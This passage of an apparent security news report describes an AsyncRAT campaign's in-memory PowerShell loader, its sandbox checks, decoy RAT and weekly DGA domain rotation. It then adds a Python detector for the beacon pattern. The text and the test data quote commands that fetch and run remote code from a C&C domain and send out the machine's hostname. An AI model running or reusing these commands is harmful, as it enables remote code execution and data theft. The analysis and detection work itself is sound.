The payload is another encoded PowerShell script, executed directly in memory (never written to disk) by a command of the form “conhost --headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)”. In Windows PowerShell, curl is an alias for Invoke-WebRequest, -useb abbreviates -UseBasicParsing, and iex is Invoke-Expression, so the downloaded text is evaluated as code as soon as it arrives. The domain of the C&C server is rotated periodically.
That script in turn fetches and executes yet another PowerShell script by invoking iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”). The request leaks the computer hostname to the C&C server together with $wiqnfex, a variable that encodes how likely the machine is to be a virtual machine or sandbox. The first script sets this value after checking the system’s graphics adapter and BIOS, both of which are typically emulated in a VM.
If $wiqnfex indicates a valid target, the server deploys AsyncRAT. If it indicates a possible VM or sandbox, the server redirects the request to Google or to a different PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is actually a distraction for any researchers looking into the campaign,” the Alien Lab researchers said. “The sample is a decoy made to resemble a RAT for several reasons. The assembly name is DecoyClient, and the configuration isn’t encrypted as it would be in an AsyncRAT sample. Additionally, the sample does not contain a C&C server, only loopback addresses. Furthermore, among the data to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A new command-and-control domain every week
In addition to regularly randomizing the script code and malware samples to evade detection, the attackers rotate the C&C domains every week. However, the Alien Labs researchers reverse-engineered the domain generation algorithm (DGA) and, combined with several constants the attackers keep fixed, such as the TLD (.top), the registrar and the organization name used to register the domains, were able to enumerate the domains used in the past and obtain earlier samples of the deployment scripts.
“These domains have been observed to carry the same features as mentioned before, with the difference of being 15 characters long,” the researchers said. “This allows us to pivot and find historical samples based off the DGA, as well as build detections to identify future infrastructure despite all their efforts to evade EDR and static detections.” The AT&T Alien Labs report includes detection signatures for this campaign written for the open-source Suricata intrusion detection system, as well as a list of indicators of compromise (IOCs) from which detections for other systems can be built.
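The beacon shape described above (a headless conhost launching PowerShell that IEXes a download, followed by requests to 1.php?hash= and 2.php?id=&lt;hostname&gt;&key=&lt;flag&gt; on a .top domain) and the DGA pivot from the previous paragraph both lend themselves to host- and proxy-level detection. The following Python is an added example and is not code from the AT&T Alien Labs report or the Suricata signatures it ships. The process command lines and proxy log lines are constructed here; the treatment of 8- and 15-character labels as a DGA hint is an assumption drawn from the one domain and the one quoted sentence on this page, not a rule from the report, and the key values 0/1 are placeholders, since the page does not say what $wiqnfex actually contains.

```python
"""Detect the two-stage PowerShell beacon and its DGA-style .top domains.

Added example with constructed telemetry; not the report's own logic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed process command lines (not captured from the campaign).
PROCESS_EVENTS = [
    "conhost --headless powershell iex(curl -useb sduyvzep.top/1.php?hash=)",
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
]

# Constructed proxy log: "<timestamp> <source-host> <method> <url> <status>".
PROXY_LOG = [
    "2024-01-01T10:00:01Z host01 GET http://sduyvzep.top/1.php?hash= 200",
    "2024-01-01T10:00:02Z host01 GET http://sduyvzep.top/2.php?id=HOST01&key=0 200",
    "2024-01-01T10:00:05Z host02 GET http://abcdefghijklmno.top/2.php?id=HOST02&key=1 302",
    "2024-01-01T10:00:09Z host03 GET http://www.example.com/index.php?id=5 200",
]

# Stage-1 launcher: headless conhost running PowerShell that pipes a
# download straight into Invoke-Expression. Accepts -headless/--headless
# and optional .exe suffixes so a trivially rewritten launcher still matches.
CMDLINE_RE = re.compile(
    r"conhost(?:\.exe)?\s+-{1,2}headless\s+powershell(?:\.exe)?\b"
    r".*\biex\s*\(\s*curl\s+-useb\b",
    re.IGNORECASE,
)

# Query-string shape of each beacon stage as described in the article.
STAGE_SHAPES = {
    "1.php": {"hash"},
    "2.php": {"id", "key"},
}

# Assumption: label lengths seen on this page (8 for sduyvzep, 15 for the
# historical domains). A real rule would use the recovered DGA instead.
DGA_LABEL_LENGTHS = {8, 15}


def is_headless_iex_launch(cmdline: str) -> bool:
    """True if a process command line matches the stage-1 launcher pattern."""
    return CMDLINE_RE.search(cmdline) is not None


def classify_beacon(url: str):
    """Return a finding dict if the URL matches a beacon stage, else None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".")
    if len(labels) != 2 or labels[1] != "top":
        return None  # campaign domains are bare <label>.top
    script = parts.path.rsplit("/", 1)[-1]
    expected = STAGE_SHAPES.get(script)
    if expected is None:
        return None
    # keep_blank_values so "hash=" (empty value) is still recorded as a key
    qs = parse_qs(parts.query, keep_blank_values=True)
    if set(qs) != expected:
        return None
    finding = {
        "domain": host,
        "stage": script,
        "dga_like_label": labels[0].isalpha() and len(labels[0]) in DGA_LABEL_LENGTHS,
    }
    if script == "2.php":
        finding["victim_id"] = qs["id"][0]      # leaked hostname
        finding["sandbox_flag"] = qs["key"][0]  # the $wiqnfex value
    return finding


def scan_proxy_log(lines):
    """Run classify_beacon over proxy log lines; return findings with source host."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        finding = classify_beacon(fields[3])
        if finding is not None:
            finding["src"] = fields[1]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for cmd in PROCESS_EVENTS:
        print("LAUNCHER" if is_headless_iex_launch(cmd) else "benign  ", cmd)
    for f in scan_proxy_log(PROXY_LOG):
        print(f)
```

The command-line check is the higher-confidence signal: conhost with --headless followed by an Invoke-Expression of a download is rare in legitimate administration. The URL classifier keys on the request shape the page describes rather than on the current domain, which is exactly the property that survives the weekly rotation; the label-length hint only adds confidence and should be replaced by the actual DGA once it is available.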